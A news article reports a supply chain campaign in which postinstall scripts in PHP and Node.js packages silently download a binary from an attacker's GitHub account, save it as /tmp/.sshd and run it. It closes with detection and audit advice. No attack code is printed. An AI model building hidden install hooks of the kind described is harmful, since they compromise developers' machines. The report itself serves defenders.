A covert supply chain attack is targeting developers by embedding a Linux binary within software packages on GitHub. This malicious script, disguised under a filename that mimics a standard system process, has affected over 700 repositories across various ecosystems.
How the Attack Operates
The threat is introduced via a harmful postinstall script within PHP and Node.js packages. When these compromised packages are installed, the script operates without alerting the user, fetching a binary from an attacker-controlled GitHub account. It stores this binary in a temporary directory on the Linux system, under the file path /tmp/.sshd, which resembles a legitimate SSH daemon file.
Researchers from Socket.dev revealed this campaign through their AI-driven scanner, which flagged the packages based on their unusual behavior during installation. The breadth of the attack extended beyond initial findings, impacting both Packagist and Node.js repositories.
Stealth Tactics and Widespread Impact
This attack is particularly hard to detect due to its stealthy nature. The script suppresses errors during installation and runs the binary in the background unnoticed. Developers examining typical installation logs would likely miss the malicious process, as the filename’s disguise blends it into the system environment.
The central point for payload delivery was identified as a GitHub account named parikhrpreksha. Consistent postinstall commands were found across numerous repositories, all downloading the same binary from a GitHub Releases URL, indicating a coordinated operation.
Preventative Measures and Recommendations
Given the attack’s reach, Socket.dev has taken steps to report affected packages, which were subsequently removed from Packagist. However, due to the use of branch-tracking versions, developers must ensure that upstream repositories are also cleared of malicious code.
Teams utilizing Packagist packages with PHP scripting or Laravel-based tools should scrutinize composer.json files for unexpected entries. It’s crucial to check for binaries with dot-prefixed names in /tmp, review GitHub Actions workflow files, and audit packages linked to development branches rather than stable releases.
This incident underscores the need for vigilance in software package management, emphasizing the importance of regular audits and updates to mitigate potential threats.
